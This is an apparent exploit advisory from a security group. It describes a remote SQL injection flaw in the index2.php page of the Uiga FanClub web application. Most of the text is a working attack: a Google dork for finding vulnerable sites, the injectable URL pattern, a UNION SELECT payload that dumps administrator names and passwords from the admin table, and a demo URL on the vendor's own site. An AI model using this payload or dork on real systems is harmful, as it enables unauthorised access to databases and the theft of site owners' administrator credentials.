Uiga FanClub suffers from a remote SQL injection vulnerability in index2.php.
b891f30b05c9592cda7573ce5109fbc6144061bfe8d26859be66aca92711d27f
########################################################################################
# #
# Exploit Title : Uiga FanClub Sql Injection Vulnerability #
# #
# Author : Secure-Land Security Team #
# #
# Discovered By : farbodmahini #
# #
# Home : Secure-Land.net #
# #
# Version : All Version #
# #
# Vendor : www.uiga.com #
# #
# Contact : farbodmahini@yahoo.fr , farbodmahini@gmail.com #
# #
# Security Risk : High #
# #
# Dork : intitle:"Uiga FanClub" #
# #
########################################################################################
# #
# Expl0iT: #
# #
# #
# http://[TarGeT]/[Patch]/index2.php?c=1&p=[SQL] #
# #
# +SQL : #
# #
# -1+union+select+1,group_concat(admin_name,0x3a,admin_password),3,4,5+from+admin #
# #
# Demo : #
# #
# http://www.uiga.com/product/demo/uigafanclub/index2.php?c=29&p=[SQL] #
# #
########################################################################################
# #
# Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us #
# #
########################################################################################
# #
# Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id #
# #
########################################################################################